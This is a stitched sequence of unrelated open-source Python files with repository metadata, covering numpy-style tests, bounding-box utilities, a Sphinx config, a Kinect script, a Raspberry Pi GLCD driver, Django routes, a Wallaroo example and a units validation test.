b[0, 0] = 1
# Verify that both point to the same data
assert a.__array_interface__['data'][0] == ptr
assert b.__array_interface__['data'][0] == ptr
# also verify offset in __array_interface__ here
for a0, b0 in zip([a[2:], a[:, 10::2], a[1::2, 10:20:2]],
[b[2:], b[:, 10::2], b[1::2, 10:20:2]]):
pa = a0.__array_interface__['data'][0]
pb = b0.__array_interface__['data'][0]
assert pa > ptr
assert pa == pb
def test_creating_functions():
# Test array
b1 = tnp.array([[1, 2, 3], [4, 5, 6]])
assert b1.shape == (2, 3)
def test_getitem():
a = np.array([[1, 2, 3, 4], [5, 6, 7, 8]])
b = tnp.array([[1, 2, 3, 4], [5, 6, 7, 8]])
if __name__ == '__main__':
# Run tests with or without pytest. Running with pytest creates
# coverage report, running without allows PM debugging to fix bugs.
if False:
del sys.modules['tinynumpy'] # or coverage wont count globals
pytest.main('-v -x --color=yes --cov tinynumpy --cov-config .coveragerc '
'--cov-report html %s' % repr(__file__))
# Run these lines to open coverage report
#import webbrowser
#webbrowser.open_new_tab(os.path.join('htmlcov', 'index.html'))
else:
# Collect function names
test_functions = []
for line in open(__file__, 'rt').readlines():
if line.startswith('def'):
name = line[3:].split('(')[0].strip()
if name.startswith('test_'):
test_functions.append(name)
# Report
print('Collected %i test functions.' % len(test_functions))
# Run
print('\nRunning tests ...\n')
for name in test_functions:
print('Running %s ... ' % name, end='')
func = globals()[name]
try:
func()
except runner.Skipped as err:
print('SKIP:', err)
except Exception:
print('FAIL')
raise
else:
print('OK')
| 30.744604
| 81
| 0.505441
|
4a15b973785a011de465c5f99e5866667daaa034
| 1,149
|
py
|
Python
|
vsc-py-intellisense/dummy_example.py
|
ytingyeu/report-issue-examples
|
41d1cd04bf749d6191d852b546cd1caa660e2bac
|
[
"MIT"
] | null | null | null |
vsc-py-intellisense/dummy_example.py
|
ytingyeu/report-issue-examples
|
41d1cd04bf749d6191d852b546cd1caa660e2bac
|
[
"MIT"
] | null | null | null |
vsc-py-intellisense/dummy_example.py
|
ytingyeu/report-issue-examples
|
41d1cd04bf749d6191d852b546cd1caa660e2bac
|
[
"MIT"
] | null | null | null |
class ClassA(object):
def __init__(self):
self._name = "Class A"
def get_name(self):
return self._name
class ClassB(object):
def __init__(self):
self._name = "Class B"
def get_name(self):
return self._name
class ClientsFactory(object):
def __init__(self, root):
self._root = root
def get_class_a(self):
return self._root._get_client('class.a')
def get_class_b(self):
return self._root._get_client('class.b')
class ClassRoot(object):
def __init__(self):
self.clients = ClientsFactory(self)
self._cache = {}
def _get_client(self, client_type):
if client_type not in self._cache:
self._cache[client_type] = self._get_instance(client_type)
return self._cache[client_type]
def _get_instance(self, client_class):
if client_class == "class.a":
return ClassA()
if client_class == "class.b":
return ClassB()
root = ClassRoot()
a = root.clients.get_class_a()
# Not able to list function get_name() with variable a
# but the function does work
print(a.get_name())
| 22.096154
| 70
| 0.633594
|
4a15b9754ffc0b57ba9bb551459b57c01c589cda
| 1,614
|
py
|
Python
|
utils/box_utils.py
|
mikito0011/Chainer_Mask_R-CNN
|
315a5b09897801c1f6f21270aa898dc2c4d96c65
|
[
"BSD-3-Clause"
] | 153
|
2018-01-17T02:24:44.000Z
|
2021-05-23T06:27:30.000Z
|
utils/box_utils.py
|
mikito0011/Chainer_Mask_R-CNN
|
315a5b09897801c1f6f21270aa898dc2c4d96c65
|
[
"BSD-3-Clause"
] | 2
|
2018-01-23T20:26:01.000Z
|
2018-06-16T01:38:43.000Z
|
utils/box_utils.py
|
mikito0011/Chainer_Mask_R-CNN
|
315a5b09897801c1f6f21270aa898dc2c4d96c65
|
[
"BSD-3-Clause"
] | 31
|
2018-01-17T07:01:33.000Z
|
2020-12-09T20:02:35.000Z
|
import numpy as np
import cupy
import cv2
def resize_bbox(bbox, in_size, out_size):
bbox_o = bbox.copy()
y_scale = float(out_size[0]) / in_size[0]
x_scale = float(out_size[1]) / in_size[1]
bbox_o[:, 0] = y_scale * bbox[:, 1]
bbox_o[:, 2] = y_scale * (bbox[:, 1]+bbox[:, 3])
bbox_o[:, 1] = x_scale * bbox[:, 0]
bbox_o[:, 3] = x_scale * (bbox[:, 0]+bbox[:, 2])
return bbox_o
def bbox_yxyx2xywh(bbox):
bbox_o = bbox.copy()
bbox_o[:, 0] = bbox[:, 1]
bbox_o[:, 2] = bbox[:, 3] - bbox[:, 1]
bbox_o[:, 1] = bbox[:, 0]
bbox_o[:, 3] = bbox[:, 2] - bbox[:, 0]
return bbox_o
def im_mask(mask, size, bbox):
# bboxes are already clipped to [0, w], [0, h]
masksize = mask.shape[0]
# pad the mask to avoid cv2.resize artifacts
pmask = np.zeros((masksize + 2, masksize + 2), dtype=np.float32)
pmask[1:-1, 1:-1] = mask
# extend the boxhead
scale = (masksize + 2) / masksize
ex_w = (bbox[3] - bbox[1]) * scale
ex_h = (bbox[2] - bbox[0]) * scale
ex_x0 = (bbox[3] + bbox[1] - ex_w) / 2
ex_y0 = (bbox[2] + bbox[0] - ex_h) / 2
ex_x1 = (bbox[3] + bbox[1] + ex_w) / 2
ex_y1 = (bbox[2] + bbox[0] + ex_h) / 2
ex_bbox = np.asarray([ex_y0, ex_x0, ex_y1, ex_x1], dtype=np.int32)
# whole-image-sized mask
immask = np.zeros((size[0],size[1]), dtype=np.uint8)
x0, x1 = max(ex_bbox[1], 0), min(ex_bbox[3] + 1, size[1])
y0, y1= max(ex_bbox[0], 0), min(ex_bbox[2] + 1, size[0])
immask_roi = cv2.resize(pmask, (x1 - x0, y1 - y0))
immask[y0:y1, x0:x1] = np.round(immask_roi).astype(np.uint8)
return immask
| 35.866667
| 70
| 0.566914
|
4a15bb234e1662e77a4cd7fe508ac5295d778427
| 8,333
|
py
|
Python
|
docs/conf.py
|
hibellm/jira
|
bf935b4ede4c2b7cc36f8e1d779a60e602319d85
|
[
"BSD-2-Clause"
] | null | null | null |
docs/conf.py
|
hibellm/jira
|
bf935b4ede4c2b7cc36f8e1d779a60e602319d85
|
[
"BSD-2-Clause"
] | null | null | null |
docs/conf.py
|
hibellm/jira
|
bf935b4ede4c2b7cc36f8e1d779a60e602319d85
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# JIRA Python Client documentation build configuration file, created by
# sphinx-quickstart on Thu May 3 17:01:50 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sphinx_rtd_theme
import sys
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('..'))
from jira import __version__ # noqa
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.viewcode',
'sphinx.ext.intersphinx']
intersphinx_mapping = {
'python': ('https://docs.python.org/3.5', None),
'requests': ('http://docs.python-requests.org/en/latest/', None),
'requests-oauthlib': ('https://requests-oauthlib.readthedocs.io/en/latest/', None),
'ipython': ('http://ipython.readthedocs.io/en/stable/', None),
'pip': ('http://pip.readthedocs.io/en/stable/', None), }
autodoc_default_flags = ['members', 'undoc-members', 'show-inheritance']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'jira-python'
copyright = u'2012, Atlassian Pty Ltd.'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = __version__
# The full version, including alpha/beta/rc tags.
release = __version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = "sphinx_rtd_theme"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
html_split_index = False
# If true, links to the reST sources are added to the pages.
html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'jirapythondoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
'papersize': 'a4paper',
'pointsize': '10pt'}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'jirapython.tex', u'jira-python Documentation',
u'Atlassian Pty Ltd.', 'manual')]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'jirapython', u'jira-python Documentation',
[u'Atlassian Pty Ltd.'], 1)]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'jirapython', u'jira-python Documentation',
u'Atlassian Pty Ltd.', 'jirapython', 'One line description of project.',
'Miscellaneous')]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
| 33.465863
| 87
| 0.712348
|
4a15bbe930d51d4d2c54f378606042f2867ed185
| 862
|
py
|
Python
|
navigation/deprecated/kinect_test.py
|
ryanmccartney/Autonomous_Electric_Wheelchair
|
0e599de8ed9bba024e729b2286afb48146a350f5
|
[
"MIT"
] | 3
|
2020-08-07T07:28:17.000Z
|
2021-08-02T21:38:42.000Z
|
navigation/deprecated/kinect_test.py
|
ryanmccartney/Autonomous_Electric_Wheelchair
|
0e599de8ed9bba024e729b2286afb48146a350f5
|
[
"MIT"
] | null | null | null |
navigation/deprecated/kinect_test.py
|
ryanmccartney/Autonomous_Electric_Wheelchair
|
0e599de8ed9bba024e729b2286afb48146a350f5
|
[
"MIT"
] | 1
|
2019-05-17T14:15:31.000Z
|
2019-05-17T14:15:31.000Z
|
#import the necessary modules
import freenect
import cv2
import numpy as np
#function to get RGB image from kinect
def get_video():
array,_ = freenect.sync_get_video()
array = cv2.cvtColor(array,cv2.COLOR_RGB2BGR)
return array
#function to get depth image from kinect
def get_depth():
array,_ = freenect.sync_get_depth()
array = array.astype(np.uint8)
return array
if __name__ == "__main__":
while 1:
#get a frame from RGB camera
frame = get_video()
#get a frame from depth sensor
depth = get_depth()
#display RGB image
cv2.imshow('RGB image',frame)
#display depth image
cv2.imshow('Depth image',depth)
# quit program when 'esc' key is pressed
k = cv2.waitKey(5) & 0xFF
if k == 27:
break
cv2.destroyAllWindows()
| 23.944444
| 49
| 0.62761
|
4a15bd8b0eda0b0fe3a98bbbc841762a9af520a6
| 418
|
py
|
Python
|
Examples/Basic/ping.py
|
NexInfinite/hivenpy
|
b20c37f68f2526a3455bbcfa1432f430ac1258cb
|
[
"MIT"
] | 9
|
2020-07-30T09:31:28.000Z
|
2021-02-17T13:23:43.000Z
|
Examples/Basic/ping.py
|
NexInfinite/hivenpy
|
b20c37f68f2526a3455bbcfa1432f430ac1258cb
|
[
"MIT"
] | null | null | null |
Examples/Basic/ping.py
|
NexInfinite/hivenpy
|
b20c37f68f2526a3455bbcfa1432f430ac1258cb
|
[
"MIT"
] | 4
|
2020-07-30T18:17:50.000Z
|
2020-08-09T23:49:01.000Z
|
from Hiven.client import Bot, events #import events
bot = Bot("Your Bot Token")
@events.event
def on_message(ctx): # this method gets called when a someone sends a message
if ctx.author.id != bot.user.id: # checks if author of message is not bot account to prevent spam
if ctx.message.content == "ping": # checks if message content is "ping"
ctx.send("pong") # sends "pong"
bot.login()
| 34.833333
| 102
| 0.679426
|
4a15bdda3cb2542ad79ba584452c57bd991463ec
| 1,616
|
py
|
Python
|
trainers/encode_tools.py
|
stormraiser/disunknown
|
194cc01851fe26bc2f0ed87cdcc238c801f4a333
|
[
"MIT"
] | 17
|
2021-09-13T19:47:15.000Z
|
2022-03-18T03:07:55.000Z
|
trainers/encode_tools.py
|
stormraiser/disunknown
|
194cc01851fe26bc2f0ed87cdcc238c801f4a333
|
[
"MIT"
] | null | null | null |
trainers/encode_tools.py
|
stormraiser/disunknown
|
194cc01851fe26bc2f0ed87cdcc238c801f4a333
|
[
"MIT"
] | 2
|
2022-01-31T02:31:11.000Z
|
2022-03-18T03:07:48.000Z
|
import math
import torch
def run_encoder(dataloader, encoder, device):
output = None
label = []
with torch.no_grad():
for batch in dataloader:
if isinstance(batch, list):
batch_image, batch_label = batch
label.append(batch_label)
else:
batch_image = batch
batch_output = encoder(batch_image.to(device))
if output is None:
output = [[torch.stack(t, 1).cpu()] for t in batch_output]
else:
for k, t in enumerate(batch_output):
output[k].append(torch.stack(t, 1).cpu())
output = [torch.cat(t, 0) for t in output]
return output if len(label) == 0 else (output, torch.cat(label, 0))
def get_code_stats(code, device):
code = code.to(torch.float64).to(device)
n = code.size(0)
m = code.size(2)
s = torch.zeros(m, dtype = torch.float64, device = device)
sxy = torch.zeros(m, m, dtype = torch.float64, device = device)
sv = torch.zeros(m, dtype = torch.float64, device = device)
for code_batch in code.split(1024):
mean, std = code_batch.unbind(1)
s.add_(mean.sum(0))
sxy.add_(mean.t() @ mean)
sv.add_(std.pow(2).sum(0))
ex = s.cpu() / n
cov = sxy.cpu() / n - ex.unsqueeze(0) * ex.unsqueeze(1)
ev = sv.cpu() / n
full_var = torch.diag(cov) + ev
full_std = full_var.sqrt()
var_ratio = torch.diag(cov) / full_var
normalized_cov = cov / (full_std.unsqueeze(0) * full_std.unsqueeze(1))
eigval, eigvec = torch.linalg.eigh(normalized_cov)
stats = {
'mean': ex.to(torch.float32),
'std': full_std.to(torch.float32),
'var_ratio': var_ratio.to(torch.float32),
'eigval': eigval.to(torch.float32),
'eigvec': eigvec.to(torch.float32)
}
return stats
| 28.350877
| 71
| 0.67203
|
4a15be7e8e0258b1aaec092fa83aeeef3b189faa
| 7,110
|
py
|
Python
|
hexa-beta/GLCD.py
|
projecthexa/hexa
|
d3ad27283903bf895c70a4f8aee2c0f899b0c797
|
[
"MIT"
] | 7
|
2018-09-12T18:53:24.000Z
|
2021-01-04T04:21:36.000Z
|
hexa-beta/GLCD.py
|
SahajKhandelwal/hexa
|
d3ad27283903bf895c70a4f8aee2c0f899b0c797
|
[
"MIT"
] | null | null | null |
hexa-beta/GLCD.py
|
SahajKhandelwal/hexa
|
d3ad27283903bf895c70a4f8aee2c0f899b0c797
|
[
"MIT"
] | 3
|
2018-05-24T22:16:37.000Z
|
2019-03-14T10:05:42.000Z
|
__author__ = 'karthi'
import time
import RPi.GPIO as GPIO
import fonts
fontWidth = 6
currentScreen = 0
class LCD_GPIO(object):
# Timing constants
E_PULSE = 0.000000070 # Addess setup time 140ns
E_DELAY = 0.000000100 # Data setup time 200ns
def __init__(self, RST,RS,RW,E1,E2,CS1,CS2, D0, D1, D2, D3, D4, D5, D6, D7):
#GPIO number Assignment
self.CS1=CS1
self.CS2=CS2
self.RST=RST
self.E1 = E1
self.E2 = E2
self.RS = RS
self.RW = RW
self.D0 = D0
self.D1 = D1
self.D2 = D2
self.D3 = D3
self.D4 = D4
self.D5 = D5
self.D6 = D6
self.D7 = D7
GPIO.setmode(GPIO.BCM) # Use BCM GPIO numbers
GPIO.setup(self.E1, GPIO.OUT) # E1
GPIO.setup(self.E2, GPIO.OUT) # E2
GPIO.setup(self.RW, GPIO.OUT) # RW
GPIO.setup(self.RS, GPIO.OUT) # RS
GPIO.setup(self.D0, GPIO.OUT) # DB0
GPIO.setup(self.D1, GPIO.OUT) # DB1
GPIO.setup(self.D2, GPIO.OUT) # DB2
GPIO.setup(self.D3, GPIO.OUT) # DB3
GPIO.setup(self.D4, GPIO.OUT) # DB4
GPIO.setup(self.D5, GPIO.OUT) # DB5
GPIO.setup(self.D6, GPIO.OUT) # DB6
GPIO.setup(self.D7, GPIO.OUT) # DB7
GPIO.setup(self.CS1, GPIO.OUT) # CS1
GPIO.setup(self.CS2, GPIO.OUT) # CS2
GPIO.output(self.RS, 0)
GPIO.output(self.RW, 0)
GPIO.output(self.E1, 0)
GPIO.output(self.E2, 0)
GPIO.output(self.CS1, 0)
GPIO.output(self.CS2, 0)
GPIO.setup(self.RST, GPIO.OUT) # RST
GPIO.output(self.RST, 0)
time.sleep(0.5)
GPIO.output(self.RST, 1)
time.sleep(0.03)
def useDisp1(self):
# use Controller 1 (Display's LEFT part)
GPIO.output(self.CS1, 1)
GPIO.output(self.CS2, 0)
def useDisp2(self):
# use Controller 2 (Display's RIGHT part)
GPIO.output(self.CS1, 0)
GPIO.output(self.CS2, 1)
def lcd_byte(self,value, mode):
GPIO.output(self.RW,0)
GPIO.output(self.RS,mode)
if (mode == 19):
GPIO.output(self.D0, (~(value)) & 0x01)
GPIO.output(self.D1, (~(value)) & 0x02)
GPIO.output(self.D2, (~(value)) & 0x04)
GPIO.output(self.D3, (~(value)) & 0x08)
GPIO.output(self.D4, (~(value)) & 0x10)
GPIO.output(self.D5, (~(value)) & 0x20)
GPIO.output(self.D6, (~(value)) & 0x40)
GPIO.output(self.D7, (~(value)) & 0x80)
else:
GPIO.output(self.D0, (value) & 0x01)
GPIO.output(self.D1, (value) & 0x02)
GPIO.output(self.D2, (value) & 0x04)
GPIO.output(self.D3, (value) & 0x08)
GPIO.output(self.D4, (value) & 0x10)
GPIO.output(self.D5, (value) & 0x20)
GPIO.output(self.D6, (value) & 0x40)
GPIO.output(self.D7, (value) & 0x80)
# Toggle E
if True:#(currentScreen == 0):
# print("cs0"+",,,"+str(currentScreen))
time.sleep(self.E_DELAY)
GPIO.output(self.E1, True)
GPIO.output(self.E2, True)
time.sleep(self.E_PULSE)
GPIO.output(self.E1, False)
GPIO.output(self.E2, False)
time.sleep(self.E_DELAY)
# elif(currentScreen == 1):
# print("cs1")
# time.sleep(self.E_DELAY)
# GPIO.output(self.E2, True)
# time.sleep(self.E_PULSE)
# GPIO.output(self.E2, False)
# time.sleep(self.E_DELAY)
# Waiting write operation complete by listening BUSY singal
# GPIO.setup(self.D7, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
# GPIO.output(self.RW,1)
# GPIO.output(self.RS,0)
# time.sleep(self.E_DELAY)
# GPIO.output(self.E, True)
# time.sleep(self.E_PULSE)
# GPIO.output(self.E, False)
# time.sleep(self.E_DELAY)
#Wait until BUSY(D7) is off
# while GPIO.input(self.D7):
# pass
# GPIO.setup(self.D7, GPIO.OUT) # set D7 back to Output
class LCD12864(object):
def __init__(self, driver):
self.driver = driver
self.lcd_init()
def setPage(self, value):
# set y=value * 8
self.driver.lcd_byte(0xB8|(value&0x07),0)
def setAddress(self, value):
# set x=value
self.driver.lcd_byte(0x40|(value&0x3F),0)
def lcd_cls(self):
# clear screen by write 0x00 to all display memory
self.driver.useDisp1()
for y in range(8):
self.setPage(y)
self.setAddress(0)
for i in range(64):
self.driver.lcd_byte(0x00,1)
self.driver.useDisp2()
for y in range(8):
self.setPage(y)
self.setAddress(0)
for i in range(64):
self.driver.lcd_byte(0x00,1)
def lcd_init(self):
currentScreen = 0
self.driver.useDisp1()
self.driver.lcd_byte(0x3F,0)
self.driver.useDisp2()
self.driver.lcd_byte(0x3F,0)
currentScreen = 1
self.driver.useDisp1()
self.driver.lcd_byte(0x3F,0)
self.driver.useDisp2()
self.driver.lcd_byte(0x3F,0)
driver = LCD_GPIO(RS=4,RW=17,E1=27,E2=7,D0=22,D1=10,D2=9,D3=11,D4=5,D5=6,D6=13,D7=19,CS1=26,CS2=21,RST=20)
lcd = LCD12864(driver=driver)
def getHexCode(string):
for ch in string:
for i in range(fontWidth):
yield fonts.font6x7[(ord(ch)-32)*fontWidth+i]
def displayText(string, lineNumber, byteNumber, screen):
global currentScreen
currentScreen = screen
byteStream = getHexCode(string)
byteStreamLength = len(string)*fontWidth
if (byteStreamLength>127-byteNumber+1):
byteStreamLength=(127-byteNumber+1)
if (byteNumber < 64):
lcd.driver.useDisp1()
lcd.setPage(lineNumber)
lcd.setAddress(byteNumber)
if(byteStreamLength > 64 - byteNumber):
for i in range(0,64-byteNumber):
lcd.driver.lcd_byte(next(byteStream),1)
lcd.driver.useDisp2()
lcd.setPage(lineNumber)
lcd.setAddress(0)
for i in range(64-byteNumber,byteStreamLength-1):
lcd.driver.lcd_byte(next(byteStream),1)
return
else:
for i in range(0,byteStreamLength-1):
lcd.driver.lcd_byte(next(byteStream),1)
return
else:
lcd.driver.useDisp2()
lcd.setPage(lineNumber)
lcd.setAddress(byteNumber-64)
for i in range (0,byteStreamLength-1):
lcd.driver.lcd_byte(next(byteStream),1)
def clearDisplay(screen):
global currentScreen
currentScreen = screen
lcd.lcd_cls()
if __name__ == "__main__":
clearDisplay(0)
print("hi")
# displayText("{:^21}".format("Project Hexa"),3,1,0)
# displayText("{:^21}".format(" Welcomes You!! "),4,1,0)
clearDisplay(1)
displayText("{:^21}".format("Project Hexa"),3,1,1)
displayText("{:^21}".format(" Welcomes You!! "),4,1,1)
# GPIO.cleanup()
| 29.259259
| 106
| 0.561885
|
4a15bef2660d2d4901173fdeabcd9d97a308058d
| 382
|
py
|
Python
|
plataform/urls.py
|
marssaljr/pharmalegre
|
05d275d858621fb62226585d8c5b6e12189615fb
|
[
"MIT"
] | null | null | null |
plataform/urls.py
|
marssaljr/pharmalegre
|
05d275d858621fb62226585d8c5b6e12189615fb
|
[
"MIT"
] | null | null | null |
plataform/urls.py
|
marssaljr/pharmalegre
|
05d275d858621fb62226585d8c5b6e12189615fb
|
[
"MIT"
] | null | null | null |
from django.urls import path
from . import views
urlpatterns = [
path('', views.home, name="home"),
path('cart/add/<str:id>', views.cart, name='cart_add'),
path('cart/inc/<str:id>', views.item_increment, name='item_increment'),
path('cart/del/<str:id>', views.item_decrement, name='item_decrement'),
path('cart/detail', views.cart_detail, name='cart_detail')
]
| 34.727273
| 75
| 0.67801
|
4a15bf87728cfb07e5ed670c113ea01094db3f5b
| 2,669
|
py
|
Python
|
examples/python/alphabet_partitioned/alphabet_partitioned.py
|
awesome-archive/wallaroo
|
852c19ffad0ed75a767a658a9a72c355e3c4c1c8
|
[
"Apache-2.0"
] | null | null | null |
examples/python/alphabet_partitioned/alphabet_partitioned.py
|
awesome-archive/wallaroo
|
852c19ffad0ed75a767a658a9a72c355e3c4c1c8
|
[
"Apache-2.0"
] | null | null | null |
examples/python/alphabet_partitioned/alphabet_partitioned.py
|
awesome-archive/wallaroo
|
852c19ffad0ed75a767a658a9a72c355e3c4c1c8
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017 The Wallaroo Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
import string
import struct
import pickle
import wallaroo
def application_setup(args):
in_host, in_port = wallaroo.tcp_parse_input_addrs(args)[0]
out_host, out_port = wallaroo.tcp_parse_output_addrs(args)[0]
letter_partitions = list(string.ascii_lowercase)
ab = wallaroo.ApplicationBuilder("alphabet")
ab.new_pipeline("alphabet",
wallaroo.TCPSourceConfig(in_host, in_port, Decoder()))
ab.to_state_partition(AddVotes(), LetterStateBuilder(), "letter state",
LetterPartitionFunction(), letter_partitions)
ab.to_sink(wallaroo.TCPSinkConfig(out_host, out_port, Encoder()))
return ab.build()
def serialize(o):
return pickle.dumps(o)
def deserialize(bs):
return pickle.loads(bs)
class LetterPartitionFunction(object):
def partition(self, data):
return data.letter[0]
class LetterStateBuilder(object):
def build(self):
return TotalVotes()
class TotalVotes(object):
def __init__(self):
self.letter = 'X'
self.votes = 0
def update(self, votes):
self.letter = votes.letter
self.votes += votes.votes
def get_votes(self):
return Votes(self.letter, self.votes)
class Votes(object):
def __init__(self, letter, votes):
self.letter = letter
self.votes = votes
class Decoder(object):
def header_length(self):
return 4
def payload_length(self, bs):
return struct.unpack(">I", bs)[0]
def decode(self, bs):
(letter, vote_count) = struct.unpack(">1sI", bs)
return Votes(letter, vote_count)
class AddVotes(object):
def name(self):
return "add votes"
def compute(self, data, state):
state.update(data)
return (state.get_votes(), True)
class Encoder(object):
def encode(self, data):
# data is a Votes
letter = data.letter
votes = data.votes
print "letter is " + str(letter)
print "votes is " + str(votes)
return struct.pack(">LsQ", 9, data.letter, data.votes)
| 25.912621
| 75
| 0.66804
|
4a15bfdf47eff289ea73f93921f99d5a53e0877d
| 2,843
|
py
|
Python
|
src/barril/units/scalar_validation/_tests/test_scalar_min_max_validator.py
|
jaimeambrus/barril
|
2897a93c660a9064f954912cc44f000d8e06a085
|
[
"MIT"
] | null | null | null |
src/barril/units/scalar_validation/_tests/test_scalar_min_max_validator.py
|
jaimeambrus/barril
|
2897a93c660a9064f954912cc44f000d8e06a085
|
[
"MIT"
] | null | null | null |
src/barril/units/scalar_validation/_tests/test_scalar_min_max_validator.py
|
jaimeambrus/barril
|
2897a93c660a9064f954912cc44f000d8e06a085
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import, unicode_literals
from barril.units import Scalar
from barril.units.scalar_validation.scalar_min_max_validator import (
ScalarMinMaxValidator
)
def _CreateTestCategories(db):
db.AddCategory(
category="test category",
quantity_type="dimensionless",
override=True,
default_unit="-",
min_value=1.0,
max_value=50.0,
valid_units="-",
is_min_exclusive=False,
is_max_exclusive=False,
)
db.AddCategory(
category="category exclusive",
quantity_type="dimensionless",
override=True,
default_unit="-",
min_value=1.0,
max_value=50.0,
valid_units="-",
is_min_exclusive=True,
is_max_exclusive=True,
default_value=5.0,
)
def testScalarValidationMsgs(unit_database):
def _Check(scalar, value, unit, expected_msg):
some_scalar = scalar.CreateCopy(value=value, unit=unit)
obtained_msg = ScalarMinMaxValidator.CreateScalarCheckErrorMsg(
some_scalar, "Some Property"
)
assert obtained_msg == expected_msg
_CreateTestCategories(unit_database)
some_scalar = Scalar("test category", 10.0, "-")
# Test value below minimum -----------------------------------------------------------------
expected_error_msg = "Error in Some Property. Invalid value for Test Category: 0. Must be greater or equal to 1.0."
_Check(some_scalar, 0.0, "-", expected_error_msg)
# Test value above maximum -----------------------------------------------------------------
expected_error_msg = "Error in Some Property. Invalid value for Test Category: 51. Must be less or equal to 50.0."
_Check(some_scalar, 51.0, "-", expected_error_msg)
# Test no error without exclusive ----------------------------------------------------------
_Check(some_scalar, 1.0, "-", None)
_Check(some_scalar, 50.0, "-", None)
# Test using min and max exclusive ---------------------------------------------------------
some_scalar = Scalar("category exclusive", 10.0, "-")
# Test value below minimum -----------------------------------------------------------------
expected_error_msg = "Error in Some Property. Invalid value for Category Exclusive: 1. Must be greater than 1.0."
_Check(some_scalar, 1.0, "-", expected_error_msg)
# Test value above maximum -----------------------------------------------------------------
